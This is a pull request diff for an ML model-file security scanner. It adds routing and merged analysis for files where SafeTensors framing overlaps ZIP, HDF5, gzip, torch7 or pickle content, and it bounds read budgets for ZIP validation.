### PR TITLE
fix(routing): prefer validated safetensors framing

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -9,7 +9,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ### Bug Fixes
 
-- prefer validated SafeTensors framing over protocol-less pickle header collisions
+- prefer validated SafeTensors framing over invalid pickle and weak-magic collisions while retaining security-bearing pickle overlaps
 - attribute core file-type validation failures directly to S901 instead of message-matching unrelated rules
 - fail closed when manifest scanning exceeds its configured timeout
 - stop cloud directory analysis as soon as download size or object-count budgets are exhausted

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -9,6 +9,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ### Bug Fixes
 
+- prefer validated SafeTensors framing over protocol-less pickle header collisions
 - classify unsafe PyTorch ZIP symlink targets as critical archive-link findings while preserving safe relative links
 - restore pickle CVE scan throughput, reprobe malformed stream separators, and route four-byte protocol-0 Joblib operands correctly
 - bound manifest embedded-Jinja template collection while preserving findings across deep branches, cycles, and shared YAML aliases

--- a/modelaudit/core.py
+++ b/modelaudit/core.py
@@ -48,10 +48,12 @@ from modelaudit.scanner_selection import (
 from modelaudit.scanners import _registry
 from modelaudit.scanners.archive_dispatch import (
     NESTED_SCAN_CALLBACK_CONFIG_KEY,
+    detect_safetensors_overlap_scanner_ids,
     merge_executable_zip_container_findings,
     merge_flax_msgpack_overlap_findings,
     merge_hdf5_userblock_zip_findings,
     merge_inconclusive_flax_msgpack_outcome,
+    merge_safetensors_overlap_analysis,
 )
 from modelaudit.scanners.base import FORMAT_VALIDATION_CONFIG_KEY, BaseScanner
 from modelaudit.scanners.mxnet_scanner import MXNET_PREFERRED_XGBOOST_SKIP_PATH_CONFIG_KEY
@@ -3581,6 +3583,7 @@ def _scan_file_internal(path: str, config: dict[str, Any] | None = None) -> Scan
         return sr
 
     hdf5_signature_offset = find_hdf5_signature_offset(path)
+    safetensors_overlap_scanner_ids = detect_safetensors_overlap_scanner_ids(path)
     try:
         max_zip_entries = int(config.get("max_zip_entries", ZipScanner.DEFAULT_MAX_ENTRIES))
     except (TypeError, ValueError):
@@ -3595,7 +3598,15 @@ def _scan_file_internal(path: str, config: dict[str, Any] | None = None) -> Scan
             max_zip_directory_size,
         )
     ):
-        return ZipScanner(config=config).scan(path)
+        preflight_result = ZipScanner(config=config).scan(path)
+        merge_safetensors_overlap_analysis(
+            path,
+            preflight_result,
+            config,
+            scanner_selection,
+            safetensors_overlap_scanner_ids,
+        )
+        return preflight_result
 
     logger.debug(f"Processing: {path}")
 
@@ -3742,6 +3753,13 @@ def _scan_file_internal(path: str, config: dict[str, Any] | None = None) -> Scan
         return sr
     if header_format == PICKLE_ROUTING_INCONCLUSIVE_FORMAT or magic_format == PICKLE_ROUTING_INCONCLUSIVE_FORMAT:
         sr = _make_incomplete_pickle_routing_result(path)
+        merge_safetensors_overlap_analysis(
+            path,
+            sr,
+            config,
+            scanner_selection,
+            safetensors_overlap_scanner_ids,
+        )
         if sr.bytes_scanned == 0 and file_size > 0:
             sr.bytes_scanned = file_size
         return sr
@@ -3750,6 +3768,13 @@ def _scan_file_internal(path: str, config: dict[str, Any] | None = None) -> Scan
         or magic_format == TENSORFLOW_PROTOBUF_ROUTING_INCONCLUSIVE_FORMAT
     ):
         sr = _make_incomplete_tensorflow_protobuf_routing_result(path)
+        merge_safetensors_overlap_analysis(
+            path,
+            sr,
+            config,
+            scanner_selection,
+            safetensors_overlap_scanner_ids,
+        )
         if sr.bytes_scanned == 0 and file_size > 0:
             sr.bytes_scanned = file_size
         return sr
@@ -3757,6 +3782,13 @@ def _scan_file_internal(path: str, config: dict[str, Any] | None = None) -> Scan
         header_format == EXECUTABLE_ZIP_POLYGLOT_FORMAT or magic_format == EXECUTABLE_ZIP_POLYGLOT_FORMAT
     ) and hdf5_signature_offset is None:
         sr = _scan_executable_zip_polyglot(path, config)
+        merge_safetensors_overlap_analysis(
+            path,
+            sr,
+            config,
+            scanner_selection,
+            safetensors_overlap_scanner_ids,
+        )
         if sr.bytes_scanned == 0 and file_size > 0:
             sr.bytes_scanned = file_size
         return sr
@@ -3811,6 +3843,13 @@ def _scan_file_internal(path: str, config: dict[str, Any] | None = None) -> Scan
             else None
         )
     except ZipPreflightRejected as exc:
+        merge_safetensors_overlap_analysis(
+            path,
+            exc.result,
+            config,
+            scanner_selection,
+            safetensors_overlap_scanner_ids,
+        )
         return exc.result
     skipped_preferred_scanner_id: str | None = None
     unavailable_preferred_scanner_id: str | None = None
@@ -4019,6 +4058,13 @@ def _scan_file_internal(path: str, config: dict[str, Any] | None = None) -> Scan
                             hdf5_signature_offset,
                             context="HDF5 user-block ZIP",
                         )
+                    merge_safetensors_overlap_analysis(
+                        path,
+                        result,
+                        config,
+                        scanner_selection,
+                        safetensors_overlap_scanner_ids,
+                    )
                     return result
 
             if unavailable_preferred_scanner_id is not None:
@@ -4066,6 +4112,14 @@ def _scan_file_internal(path: str, config: dict[str, Any] | None = None) -> Scan
             context="overlapping JSON analysis",
             kind=SCANNER_SELECTION_PREFERRED_KIND,
         )
+
+    merge_safetensors_overlap_analysis(
+        path,
+        result,
+        config,
+        scanner_selection,
+        safetensors_overlap_scanner_ids,
+    )
 
     if is_xgboost_pickle_spoof:
         _mark_xgboost_pickle_extension_spoof(result, path, ext)
@@ -4129,6 +4183,7 @@ def _scan_file_internal(path: str, config: dict[str, Any] | None = None) -> Scan
     if (
         hdf5_userblock_supplemental_scanner_id not in (None, "zip")
         and result.scanner_name != hdf5_userblock_supplemental_scanner_id
+        and hdf5_userblock_supplemental_scanner_id not in safetensors_overlap_scanner_ids
     ):
         _merge_supplemental_scanner_analysis(
             path,

--- a/modelaudit/scanner_selection.py
+++ b/modelaudit/scanner_selection.py
@@ -461,12 +461,18 @@ def scanner_ids_for_detected_format(detected_format: str) -> frozenset[str]:
             scanner_ids.add(scanner_id)
     if detected_format in {"zip", EXECUTABLE_ZIP_POLYGLOT_FORMAT}:
         scanner_ids.update(_ZIP_STRUCTURE_ROUTED_SCANNER_IDS)
+    if detected_format == EXECUTABLE_ZIP_POLYGLOT_FORMAT:
+        scanner_ids.add("safetensors")
     if detected_format in {"tar", "gzip", "bzip2", "xz"}:
         scanner_ids.add("nemo")
     if detected_format in {"gzip", "bzip2", "xz"}:
         scanner_ids.add("tar")
-    if detected_format == LLAMAFILE_ROUTING_INCONCLUSIVE_FORMAT:
+    if detected_format == "safetensors":
+        scanner_ids.update({"compressed", "keras_h5", "llamafile", "pickle", "torch7"})
+        scanner_ids.update(_ZIP_STRUCTURE_ROUTED_SCANNER_IDS)
+    if detected_format in {"llamafile", LLAMAFILE_ROUTING_INCONCLUSIVE_FORMAT}:
         scanner_ids.add("llamafile")
+        scanner_ids.add("safetensors")
         scanner_ids.update(_ZIP_STRUCTURE_ROUTED_SCANNER_IDS)
     if detected_format == PROTOBUF_MODEL_CANDIDATE_FORMAT:
         scanner_ids.update({"coreml", "onnx", "tf_metagraph", "tf_savedmodel"})

--- a/modelaudit/scanners/archive_dispatch.py
+++ b/modelaudit/scanners/archive_dispatch.py
@@ -20,8 +20,10 @@ from ..scanner_results import (
 )
 from ..scanner_selection import (
     SCANNER_SELECTION_PREFERRED_KIND,
+    ScannerSelectionPolicy,
     add_scanner_selection_skip_check,
     allows_protobuf_model_candidate_analysis,
+    allows_zip_content_analysis,
     allows_zip_structure_analysis,
     make_scanner_selection_skip_result,
     policy_from_config,
@@ -46,13 +48,16 @@ from ..utils.file.detection import (
     detect_pytorch_binary_supplemental_format,
     detect_xgboost_ubjson_content_route,
     has_inconclusive_renamed_flax_msgpack_routing,
+    has_safetensors_gzip_nonmember_trailing_overlap,
+    has_safetensors_routing_candidate,
+    has_structural_torch7_content_route,
     is_executorch_archive,
     is_keras_zip_archive,
     is_pytorch_zip_archive,
     is_skops_archive,
     is_torchserve_mar_archive,
 )
-from ..utils.file.hdf5 import HDF5_SIGNATURE_SCAN_MAX_BYTES
+from ..utils.file.hdf5 import HDF5_SIGNATURE_SCAN_MAX_BYTES, find_hdf5_signature_offset
 from .base import FORMAT_VALIDATION_CONFIG_KEY
 from .mxnet_scanner import MXNET_PREFERRED_XGBOOST_SKIP_PATH_CONFIG_KEY
 from .xgboost_scanner import (
@@ -89,7 +94,10 @@ _ONNX_ROUTING_INCOMPLETE_REASON = "onnx_routing_incomplete"
 _TENSORFLOW_PROTOBUF_ROUTING_INCOMPLETE_REASON = "tensorflow_protobuf_routing_incomplete"
 SKIP_COMPOSED_ARCHIVE_MEMBER_SCAN_CONFIG_KEY = "_skip_composed_archive_member_scan"
 KNOWN_UNREADABLE_ARCHIVE_ENTRY_OFFSETS_CONFIG_KEY = "_known_unreadable_archive_entry_offsets"
+_ZIP_CONTAINER_DISPATCHED_PATHS_PRIVATE_METADATA_KEY = "_zip_container_dispatched_paths"
 _MAX_HDF5_USERBLOCK_ZIP_SEGMENTS = 16
+_MAX_HDF5_USERBLOCK_ZIP_CANDIDATE_VALIDATIONS = 64
+_MAX_HDF5_USERBLOCK_ZIP_VALIDATION_READ_BYTES = 32 * 1024 * 1024
 _ZIP_LEADING_SIGNATURES: tuple[bytes, ...] = (
     b"PK\x03\x04",
     b"PK\x01\x02",
@@ -235,6 +243,98 @@ def _merge_pytorch_binary_supplemental_analysis(
     result.metadata.setdefault("supplemental_scanners", []).append(supplemental_scanner_id)
 
 
+def detect_safetensors_overlap_scanner_ids(path: str) -> frozenset[str]:
+    """Return non-HDF5 scanners that own a validated SafeTensors overlap."""
+    if not has_safetensors_routing_candidate(path):
+        return frozenset()
+    scanner_ids = {"safetensors"}
+    hdf5_signature_offset = find_hdf5_signature_offset(path)
+    try:
+        if zipfile.is_zipfile(path):
+            scanner_ids.add("zip")
+    except OSError:
+        pass
+    if hdf5_signature_offset is not None:
+        try:
+            detected_format = detect_file_format(path)
+        except OSError:
+            detected_format = "unknown"
+        detected_scanner_id = _HEADER_FORMAT_TO_SCANNER_ID.get(detected_format)
+        if isinstance(detected_scanner_id, str) and detected_scanner_id != "keras_h5":
+            scanner_ids.add(detected_scanner_id)
+    if has_safetensors_gzip_nonmember_trailing_overlap(path):
+        scanner_ids.add("compressed")
+    if has_structural_torch7_content_route(path):
+        scanner_ids.add("torch7")
+    return frozenset(scanner_ids)
+
+
+def merge_safetensors_overlap_analysis(
+    path: str,
+    result: ScanResult,
+    config: dict[str, Any] | None,
+    scanner_selection: ScannerSelectionPolicy,
+    scanner_ids: frozenset[str],
+) -> None:
+    """Merge every trusted owner of a validated SafeTensors overlap for this path."""
+    from . import _registry
+
+    pending_scanner_ids = set(scanner_ids - {result.scanner_name})
+    dispatched_zip_paths = result._private_metadata.get(_ZIP_CONTAINER_DISPATCHED_PATHS_PRIVATE_METADATA_KEY, ())
+    zip_already_dispatched = (
+        isinstance(dispatched_zip_paths, list | tuple | set | frozenset)
+        and os.path.realpath(path) in dispatched_zip_paths
+    )
+    if result.scanner_name == "zip" and "zip" in scanner_ids and not zip_already_dispatched:
+        pending_scanner_ids.add("zip")
+
+    for scanner_id in sorted(pending_scanner_ids):
+        zip_analysis_allowed = scanner_id == "zip" and allows_zip_content_analysis(scanner_selection)
+        if not zip_analysis_allowed and not scanner_selection.allows(scanner_id):
+            add_scanner_selection_skip_check(
+                result,
+                path,
+                scanner_id,
+                scanner_selection,
+                context="validated SafeTensors overlapping content analysis",
+            )
+            continue
+
+        if scanner_id == "zip":
+            supplemental_result = ScanResult(scanner_name="zip")
+            merge_executable_zip_container_findings(
+                path,
+                supplemental_result,
+                config,
+                context="validated SafeTensors overlapping ZIP analysis",
+            )
+            supplemental_result.finish(success=not supplemental_result.has_errors)
+        else:
+            scanner_class = _registry.load_scanner_by_id(scanner_id)
+            if scanner_class is None:
+                supplemental_result = _make_unavailable_recognized_format_result(path, scanner_id, scanner_id)
+            else:
+                supplemental_config = config
+                if scanner_id == "compressed":
+                    from .compressed_scanner import ALLOW_SAFETENSORS_NONMEMBER_TRAILING_CONFIG_KEY
+
+                    supplemental_config = dict(config or {})
+                    supplemental_config[ALLOW_SAFETENSORS_NONMEMBER_TRAILING_CONFIG_KEY] = True
+                supplemental_result = scanner_class(config=supplemental_config).scan(path)
+
+        primary_bytes_scanned = result.bytes_scanned
+        result.merge(supplemental_result)
+        result.bytes_scanned = max(primary_bytes_scanned, supplemental_result.bytes_scanned)
+        if scanner_id != result.scanner_name:
+            supplemental_scanners = result.metadata.setdefault("supplemental_scanners", [])
+            if isinstance(supplemental_scanners, list) and scanner_id not in supplemental_scanners:
+                supplemental_scanners.append(scanner_id)
+        supplemental_scanners = result.metadata.get("supplemental_scanners")
+        if isinstance(supplemental_scanners, list):
+            result.metadata["supplemental_scanners"] = list(dict.fromkeys(supplemental_scanners))
+        _deduplicate_exact_merged_findings(result)
+
+
 def _nested_scanner_can_handle(
     scanner_class: type[Any],
     scanner_id: str,
@@ -372,6 +472,17 @@ def _merge_composed_scan_result(result: ScanResult, other: ScanResult) -> None:
         result.metadata[SCAN_OUTCOME_REASONS_METADATA_KEY] = combined_reasons
 
 
+def _mark_zip_container_dispatched(result: ScanResult, path: str) -> None:
+    """Retain local ZIP dispatch ownership across nested result merges."""
+    dispatched_paths = result._private_metadata.setdefault(_ZIP_CONTAINER_DISPATCHED_PATHS_PRIVATE_METADATA_KEY, [])
+    if not isinstance(dispatched_paths, list):
+        dispatched_paths = []
+        result._private_metadata[_ZIP_CONTAINER_DISPATCHED_PATHS_PRIVATE_METADATA_KEY] = dispatched_paths
+    normalized_path = os.path.realpath(path)
+    if normalized_path not in dispatched_paths:
+        dispatched_paths.append(normalized_path)
+
+
 def merge_executable_zip_container_findings(
     path: str,
     result: ScanResult,
@@ -389,6 +500,8 @@ def merge_executable_zip_container_findings(
     except OSError:
         return
 
+    _mark_zip_container_dispatched(result, path)
+
     scanner_selection = policy_from_config(config)
     ext = os.path.splitext(path)[1].lower()
     subtype_ids: list[str] = []
@@ -405,6 +518,7 @@ def merge_executable_zip_container_findings(
             subtype_ids.append("skops")
     except ZipPreflightRejected as exc:
         result.merge(exc.result)
+        _mark_zip_container_dispatched(result, path)
         return
 
     subtype_config = dict(config or {})
@@ -447,6 +561,7 @@ def merge_executable_zip_container_findings(
         )
 
     _deduplicate_exact_merged_findings(result)
+    _mark_zip_container_dispatched(result, path)
 
 
 def merge_hdf5_userblock_zip_findings(
@@ -645,9 +760,10 @@ def _replace_nested_path(value: Any, old_path: str, new_path: str) -> Any:
 class _LogicalEOFReader:
     """Expose a bounded logical EOF for ZIP validation without copying again."""
 
-    def __init__(self, handle: BinaryIO, logical_size: int) -> None:
+    def __init__(self, handle: BinaryIO, logical_size: int, read_budget: list[int]) -> None:
         self._handle = handle
         self._logical_size = logical_size
+        self._read_budget = read_budget
 
     def tell(self) -> int:
         return self._handle.tell()
@@ -667,7 +783,12 @@ class _LogicalEOFReader:
 
     def read(self, size: int = -1) -> bytes:
         remaining = max(0, self._logical_size - self.tell())
-        return self._handle.read(remaining if size < 0 else min(size, remaining))
+        requested = remaining if size < 0 else min(size, remaining)
+        if requested > self._read_budget[0]:
+            raise OSError("HDF5 user-block ZIP validation read budget exhausted")
+        data = self._handle.read(requested)
+        self._read_budget[0] -= len(data)
+        return data
 
     def seekable(self) -> bool:
         return True
@@ -679,7 +800,10 @@ def _find_valid_zip_logical_segments(
     signature_offset: int,
 ) -> list[tuple[int, int]]:
     """Return archive starts and complete ZIP ends before the HDF5 signature."""
+    if len(eocd_offsets) > _MAX_HDF5_USERBLOCK_ZIP_CANDIDATE_VALIDATIONS:
+        raise OSError("HDF5 user block contains too many ZIP end-record candidates to validate safely")
     logical_segments: list[tuple[int, int]] = []
+    read_budget = [_MAX_HDF5_USERBLOCK_ZIP_VALIDATION_READ_BYTES]
     with open(temp_path, "rb") as handle:
         for eocd_offset in eocd_offsets:
             handle.seek(eocd_offset)
@@ -689,7 +813,7 @@ def _find_valid_zip_logical_segments(
             logical_end = eocd_offset + 22 + int.from_bytes(end_record[20:22], "little")
             if logical_end > signature_offset:
                 continue
-            bounded_reader = _LogicalEOFReader(handle, logical_end)
+            bounded_reader = _LogicalEOFReader(handle, logical_end, read_budget)
             bounded_reader.seek(0)
             try:
                 with zipfile.ZipFile(bounded_reader) as archive:
@@ -1039,21 +1163,56 @@ def scan_nested_file(path: str, config: dict[str, Any] | None = None) -> ScanRes
     from .zip_scanner import ZipPreflightRejected, ZipScanner
 
     scanner_selection = policy_from_config(config)
+    hdf5_signature_offset = find_hdf5_signature_offset(path)
+    safetensors_overlap_scanner_ids = detect_safetensors_overlap_scanner_ids(path)
+    is_safetensors_hdf5_overlap = hdf5_signature_offset is not None and bool(safetensors_overlap_scanner_ids)
+    if is_safetensors_hdf5_overlap:
+        safetensors_overlap_scanner_ids |= {"safetensors"}
+
+    def with_safetensors_overlap(result: ScanResult) -> ScanResult:
+        if (
+            is_safetensors_hdf5_overlap
+            and hdf5_signature_offset not in (None, 0)
+            and allows_zip_content_analysis(scanner_selection)
+        ):
+            assert hdf5_signature_offset is not None
+            merge_hdf5_userblock_zip_findings(
+                path,
+                result,
+                config,
+                hdf5_signature_offset,
+                context="nested HDF5 user-block ZIP",
+            )
+        merge_safetensors_overlap_analysis(
+            path,
+            result,
+            config,
+            scanner_selection,
+            safetensors_overlap_scanner_ids,
+        )
+        return result
+
     raw_config = config or {}
     try:
         max_zip_entries = int(raw_config.get("max_zip_entries", ZipScanner.DEFAULT_MAX_ENTRIES))
     except (TypeError, ValueError):
         max_zip_entries = ZipScanner.DEFAULT_MAX_ENTRIES
     max_zip_directory_size = ZipScanner.central_directory_size_limit(raw_config)
-    if allows_zip_structure_analysis(scanner_selection, path) and ZipScanner.requires_preflight_result(
-        path,
-        max_zip_entries,
-        max_zip_directory_size,
+    if (
+        (not is_safetensors_hdf5_overlap or hdf5_signature_offset in (None, 0))
+        and allows_zip_structure_analysis(scanner_selection, path)
+        and ZipScanner.requires_preflight_result(
+            path,
+            max_zip_entries,
+            max_zip_directory_size,
+        )
     ):
-        return ZipScanner(config=config).scan(path)
+        return with_safetensors_overlap(ZipScanner(config=config).scan(path))
     scanner_class = None
     routed_content_format = detect_file_format(path)
     trusted_content_format = detect_file_format_from_magic(path)
+    if is_safetensors_hdf5_overlap:
+        trusted_content_format = "hdf5"
     skipped_overlap_scanner_id: str | None = None
     if (
         trusted_content_format == "xgboost"
@@ -1114,9 +1273,9 @@ def scan_nested_file(path: str, config: dict[str, Any] | None = None) -> ScanRes
                 config = dict(config or {})
                 config[XGBOOST_CONTENT_ROUTED_UBJSON_CONFIG_KEY] = True
     if trusted_content_format == LLAMAFILE_ROUTING_INCONCLUSIVE_FORMAT:
-        return _make_incomplete_llamafile_routing_result(path, config)
+        return with_safetensors_overlap(_make_incomplete_llamafile_routing_result(path, config))
     if trusted_content_format == NEMO_ROUTING_INCONCLUSIVE_FORMAT:
-        return _make_incomplete_nemo_routing_result(path)
+        return with_safetensors_overlap(_make_incomplete_nemo_routing_result(path))
     if trusted_content_format == MXNET_SYMBOL_ROUTING_INCONCLUSIVE_FORMAT:
         result = _make_incomplete_mxnet_symbol_routing_result(path, config)
         if skipped_overlap_scanner_id:
@@ -1128,15 +1287,15 @@ def scan_nested_file(path: str, config: dict[str, Any] | None = None) -> ScanRes
                 context="overlapping JSON analysis",
                 kind=SCANNER_SELECTION_PREFERRED_KIND,
             )
-        return result
+        return with_safetensors_overlap(result)
     if trusted_content_format == XGBOOST_UBJSON_ROUTING_INCONCLUSIVE_FORMAT:
-        return _make_incomplete_xgboost_ubjson_routing_result(path)
+        return with_safetensors_overlap(_make_incomplete_xgboost_ubjson_routing_result(path))
     if trusted_content_format == ONNX_ROUTING_INCONCLUSIVE_FORMAT:
-        return _make_incomplete_onnx_routing_result(path)
+        return with_safetensors_overlap(_make_incomplete_onnx_routing_result(path))
     if trusted_content_format == PICKLE_ROUTING_INCONCLUSIVE_FORMAT:
-        return _make_incomplete_pickle_routing_result(path)
+        return with_safetensors_overlap(_make_incomplete_pickle_routing_result(path))
     if trusted_content_format == TENSORFLOW_PROTOBUF_ROUTING_INCONCLUSIVE_FORMAT:
-        return _make_incomplete_tensorflow_protobuf_routing_result(path)
+        return with_safetensors_overlap(_make_incomplete_tensorflow_protobuf_routing_result(path))
     if trusted_content_format == EXECUTABLE_ZIP_POLYGLOT_FORMAT:
         result = ScanResult(scanner_name="zip")
         merge_executable_zip_container_findings(
@@ -1146,13 +1305,13 @@ def scan_nested_file(path: str, config: dict[str, Any] | None = None) -> ScanRes
             context="nested executable ZIP polyglot",
         )
         result.finish(success=not result.has_errors)
-        return result
+        return with_safetensors_overlap(result)
 
-    header_format_override = trusted_content_format if trusted_content_format in {"mxnet", "xgboost"} else None
+    header_format_override = trusted_content_format if trusted_content_format in {"hdf5", "mxnet", "xgboost"} else None
     try:
         scanner_id = _select_nested_scanner_id(path, header_format_override, config)
     except ZipPreflightRejected as exc:
-        return exc.result
+        return with_safetensors_overlap(exc.result)
     pytorch_binary_supplemental_scanner_id = (
         detect_pytorch_binary_supplemental_format(path)
         if os.path.splitext(path)[1].lower() == ".bin" and scanner_id == "pytorch_binary"
@@ -1229,20 +1388,26 @@ def scan_nested_file(path: str, config: dict[str, Any] | None = None) -> ScanRes
                         or candidate_scanner_class.name
                     )
             if candidate_scanner_id and not scanner_selection.allows(candidate_scanner_id):
-                return make_scanner_selection_skip_result(path, candidate_scanner_id, scanner_selection)
+                return with_safetensors_overlap(
+                    make_scanner_selection_skip_result(path, candidate_scanner_id, scanner_selection)
+                )
 
         if trusted_content_format == XML_MODEL_INCONCLUSIVE_FORMAT:
-            return _make_incomplete_xml_model_result(path)
+            return with_safetensors_overlap(_make_incomplete_xml_model_result(path))
         if routed_content_format == PROTOBUF_MODEL_CANDIDATE_FORMAT:
-            return _make_incomplete_protobuf_model_result(path)
+            return with_safetensors_overlap(_make_incomplete_protobuf_model_result(path))
         if trusted_content_format == PROTOBUF_MODEL_CANDIDATE_FORMAT and routed_content_format != "unknown":
-            return _make_unavailable_recognized_format_result(path, routed_content_format, scanner_id)
+            return with_safetensors_overlap(
+                _make_unavailable_recognized_format_result(path, routed_content_format, scanner_id)
+            )
         if trusted_content_format != "unknown":
-            return _make_unavailable_recognized_format_result(path, trusted_content_format, scanner_id)
+            return with_safetensors_overlap(
+                _make_unavailable_recognized_format_result(path, trusted_content_format, scanner_id)
+            )
 
         result = ScanResult(scanner_name="unknown")
         result.finish(success=True)
-        return result
+        return with_safetensors_overlap(result)
 
     scanner_config = dict(config or {})
     if routed_content_format == PROTOBUF_MODEL_CANDIDATE_FORMAT:
@@ -1314,4 +1479,4 @@ def scan_nested_file(path: str, config: dict[str, Any] | None = None) -> ScanRes
             config,
             pytorch_binary_supplemental_scanner_id,
         )
-    return result
+    return with_safetensors_overlap(result)

--- a/modelaudit/scanners/archive_dispatch.py
+++ b/modelaudit/scanners/archive_dispatch.py
@@ -253,6 +253,7 @@ def detect_safetensors_overlap_scanner_ids(path: str) -> frozenset[str]:
         if zipfile.is_zipfile(path):
             scanner_ids.add("zip")
     except OSError:
+        # ZIP overlap probing is supplemental; preserve the independent checks below.
         pass
     if hdf5_signature_offset is not None:
         try:

--- a/modelaudit/scanners/archive_member_security.py
+++ b/modelaudit/scanners/archive_member_security.py
@@ -7838,6 +7838,7 @@ def scan_archive_member_for_known_risks(
     executable_analysis_incomplete_reason: str,
     analyze_python_source: bool = True,
     analyze_executable_content: bool = True,
+    sniff_python_source: bool = False,
 ) -> None:
     """Inspect generic archive members that nested dispatch would otherwise ignore.
 
@@ -7958,7 +7959,7 @@ def scan_archive_member_for_known_risks(
 
     if (
         analyze_python_source
-        and "." not in normalized_lower.rsplit("/", maxsplit=1)[-1]
+        and (sniff_python_source or "." not in normalized_lower.rsplit("/", maxsplit=1)[-1])
         and total_size <= max_python_analysis_bytes
         and tmp_path is not None
     ):

--- a/modelaudit/scanners/compressed_scanner.py
+++ b/modelaudit/scanners/compressed_scanner.py
@@ -21,6 +21,8 @@ from ._archive_outcomes import member_scan_incomplete
 from .archive_member_security import scan_archive_member_for_known_risks
 from .base import BaseScanner, IssueSeverity, ScanResult
 
+ALLOW_SAFETENSORS_NONMEMBER_TRAILING_CONFIG_KEY = "_compressed_allow_safetensors_nonmember_trailing"
+
 
 class _DecompressionLimitExceeded(ValueError):
     """Raised when decompression policies are exceeded."""
@@ -272,16 +274,24 @@ class CompressedScanner(BaseScanner):
         compressed_size: int,
         chunk_size: int,
         on_new_member: Callable[[], None] | None = None,
+        allow_nonmember_trailing: bool = False,
     ) -> int:
         decompressor = decompressor_factory()
         total_out = 0
+        ignored_nonmember_trailing = False
+
+        def should_ignore_proven_nonmember_trailing(pending: bytes) -> bool:
+            return bool(pending) and allow_nonmember_trailing and codec == "gzip"
 
         def _consume_pending(pending: bytes) -> None:
-            nonlocal decompressor, total_out
+            nonlocal decompressor, ignored_nonmember_trailing, total_out
             while pending or not getattr(decompressor, "needs_input", True):
                 if getattr(decompressor, "eof", False):
                     if not pending:
                         break
+                    if should_ignore_proven_nonmember_trailing(pending):
+                        ignored_nonmember_trailing = True
+                        return
                     if on_new_member is not None:
                         on_new_member()
                     decompressor = decompressor_factory()
@@ -311,6 +321,9 @@ class CompressedScanner(BaseScanner):
 
                 unused_data = getattr(decompressor, "unused_data", b"")
                 if unused_data:
+                    if should_ignore_proven_nonmember_trailing(unused_data):
+                        ignored_nonmember_trailing = True
+                        return
                     pending = unused_data
                     if on_new_member is not None:
                         on_new_member()
@@ -321,8 +334,13 @@ class CompressedScanner(BaseScanner):
             if not pending:
                 break
             _consume_pending(pending)
+            if ignored_nonmember_trailing:
+                break
 
         _consume_pending(b"")
+
+        if ignored_nonmember_trailing:
+            return total_out
 
         if not getattr(decompressor, "eof", False):
             raise _CorruptStreamError(f"Invalid {codec} stream: missing end-of-stream marker")
@@ -384,6 +402,7 @@ class CompressedScanner(BaseScanner):
         compressed_size: int,
         chunk_size: int,
         on_new_member: Callable[[], None] | None = None,
+        allow_nonmember_trailing: bool = False,
     ) -> int:
         return CompressedScanner._read_concatenated_stream_with_limits(
             source=source,
@@ -396,6 +415,7 @@ class CompressedScanner(BaseScanner):
             compressed_size=compressed_size,
             chunk_size=chunk_size,
             on_new_member=on_new_member,
+            allow_nonmember_trailing=allow_nonmember_trailing,
         )
 
     @staticmethod
@@ -619,6 +639,7 @@ class CompressedScanner(BaseScanner):
                         compressed_size=compressed_size,
                         chunk_size=self.chunk_size,
                         on_new_member=lambda: outputs.start_new_member(suffix),
+                        allow_nonmember_trailing=bool(self.config.get(ALLOW_SAFETENSORS_NONMEMBER_TRAILING_CONFIG_KEY)),
                     )
                 elif codec == "bzip2":
                     total_out = self._read_bzip2_stream_with_limits(
@@ -734,6 +755,7 @@ class CompressedScanner(BaseScanner):
         member_temp_paths: list[str],
         decompressed_bytes: int,
         inner_owns_executable_content: bool,
+        sniff_python_source: bool,
         result: ScanResult,
     ) -> None:
         first_issue = len(result.issues)
@@ -749,6 +771,7 @@ class CompressedScanner(BaseScanner):
             python_analysis_incomplete_reason=self._PYTHON_PAYLOAD_INCONCLUSIVE_REASON,
             executable_analysis_incomplete_reason=self._EXECUTABLE_PAYLOAD_INCONCLUSIVE_REASON,
             analyze_executable_content=not inner_owns_executable_content,
+            sniff_python_source=sniff_python_source,
         )
         self._set_compressed_provenance(
             result,
@@ -782,6 +805,7 @@ class CompressedScanner(BaseScanner):
                 python_analysis_incomplete_reason=self._PYTHON_PAYLOAD_INCONCLUSIVE_REASON,
                 executable_analysis_incomplete_reason=self._EXECUTABLE_PAYLOAD_INCONCLUSIVE_REASON,
                 analyze_python_source=aggregate_python_incomplete,
+                sniff_python_source=sniff_python_source,
             )
             self._set_compressed_provenance(
                 result,
@@ -912,6 +936,7 @@ class CompressedScanner(BaseScanner):
             )
 
             nested_config = dict(self.config)
+            nested_config.pop(ALLOW_SAFETENSORS_NONMEMBER_TRAILING_CONFIG_KEY, None)
             nested_config["_compressed_depth"] = depth + 1
             nested_config["_archive_depth"] = depth + 1
             # Extracted temp paths are removed after this scan and cannot yield reusable cache entries.
@@ -936,6 +961,7 @@ class CompressedScanner(BaseScanner):
                 inner_owns_executable_content=(
                     len(member_temp_paths) == 1 and inner_result.scanner_name == "llamafile" and inner_result.success
                 ),
+                sniff_python_source=bool(self.config.get(ALLOW_SAFETENSORS_NONMEMBER_TRAILING_CONFIG_KEY)),
                 result=result,
             )
 

--- a/modelaudit/utils/file/detection.py
+++ b/modelaudit/utils/file/detection.py
@@ -1,13 +1,21 @@
+import bz2
+import codecs
 import json
+import lzma
+import math
 import pickletools
 import posixpath
 import re
 import struct
+import sys
 import tarfile
 import zipfile
+import zlib
+from collections.abc import Iterator
+from dataclasses import dataclass, field
 from io import BytesIO, StringIO
 from pathlib import Path, PurePosixPath
-from typing import Any, BinaryIO, Literal
+from typing import Any, BinaryIO, Literal, cast
 
 from ...scanner_registry_metadata import get_extension_format_map, get_registered_scanner_extensions
 from ..helpers.types import FileExtension, FileFormat, FilePath, MagicBytes
@@ -917,12 +925,281 @@ PROTO0_1_MAX_PROBE_BYTES: int = 64 * 1024
 # budget aligned with the byte budget so trivial padding cannot hide a later
 # dangerous opcode inside the sampled prefix.
 PROTO0_1_MAX_PROBE_OPCODES: int = PROTO0_1_MAX_PROBE_BYTES
+_PICKLE_FRAME_BRANCH_MAX: int = 32
+_PICKLE_MAX_STRUCTURAL_MEMO_INDEX: int = sys.maxsize // struct.calcsize("P") - 1
+_PICKLE_NUMERIC_OPERAND_MAX_BYTES: int = 4096
+_PICKLE_UNICODE_VALIDATE_MAX_BYTES: int = 16 * 1024 * 1024
